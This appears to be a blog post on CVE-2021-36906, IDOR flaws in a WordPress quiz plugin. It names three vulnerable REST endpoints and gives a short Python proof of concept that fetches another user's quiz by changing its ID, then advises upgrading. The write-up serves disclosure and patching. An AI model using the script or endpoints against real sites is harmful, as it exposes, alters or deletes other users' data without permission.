CVE-2021-36906 - Multiple Insecure Direct Object References (IDOR) Vulnerabilities Discovered in the ExpressTech Quiz And Survey Master WordPress Plugin Version 7.3.6 or Earlier

ExpressTech Quiz And Survey Master is a popular WordPress plugin that allows users to create and manage quizzes and surveys on their websites easily. However, the plugin versions 7.3.6 or earlier contain multiple Insecure Direct Object References (IDOR) vulnerabilities. In this blog post, we will discuss what IDOR vulnerabilities are, how they can be exploited in the ExpressTech Quiz And Survey Master plugin, and their potential impact. We will also provide code snippets, links to the original references, and exploit details related to CVE-2021-36906.

What are IDOR Vulnerabilities?
IDOR (Insecure Direct Object References) vulnerabilities generally occur when an application exposes internal identifiers or references to user-controlled input, allowing a malicious user to obtain unauthorized access to sensitive data by altering the input values. In the context of CVE-2021-36906, multiple IDOR vulnerabilities could potentially allow an attacker to access, modify, or delete other users' quizzes and surveys without proper permissions.

How can CVE-2021-36906 be exploited?
The insecure direct object references vulnerabilities were found in the following API endpoints of the ExpressTech Quiz And Survey Master plugin's API:
- GET "/wp-json/qsm/v2/quiz/{quiz_id}"
- POST "/wp-json/qsm/v2/quiz/{quiz_id}"
- DELETE "/wp-json/qsm/v2/quiz/{quiz_id}"

The plugin did not properly implement sufficient access controls to verify whether a user (attacker) has the necessary permissions to view, modify, or delete a given quiz or survey. An attacker could potentially exploit these vulnerabilities by modifying the "{quiz_id}" in the API endpoints, thus allowing unauthorized access to other users' quizzes and surveys.

Code Snippet

The following code snippet shows an example of how an attacker could exploit this vulnerability by sending a GET request to the "/wp-json/qsm/v2/quiz/{quiz_id}" API endpoint, altering the "{quiz_id}" to access a target quiz or survey.

import requests

target_url = "https://example.com/wp-json/qsm/v2/quiz/";
quiz_id = "1"  # Change this value to the target quiz or survey ID
cookies = {'wordpress_logged_in_xxxxx': 'your_cookie_here'}

response = requests.get(target_url + quiz_id, cookies=cookies)

if response.status_code == 200:
    print("Quiz Details: ")
    print(response.json())
else:
    print("Quiz not found or access denied.")

Original References and Exploit Details

The vulnerabilities were initially reported to the WordPress plugin security team by an anonymous security researcher. The initial public disclosure and details of CVE-2021-36906 can be found on the Mitre CVE website:

CVE-2021-36906 – NVD

Following the public disclosure, the ExpressTech Quiz And Survey Master plugin developers released an updated version (7.3.7) to address these vulnerabilities. If you're using a version of the plugin earlier than 7.3.7, we recommend you update it immediately to protect your website from unauthorized access and potential misuse of user data.

Conclusion

IDOR vulnerabilities, as demonstrated by CVE-2021-36906, can put sensitive information and user data at risk. It's vital for developers to ensure proper access controls and input validation when dealing with user-controlled input to limit potential security risks. By staying informed about security vulnerabilities and keeping the software up-to-date, users can help protect their websites from potential attacks.

Timeline

Published on: 11/03/2022 20:15:00 UTC
Last modified on: 11/04/2022 14:08:00 UTC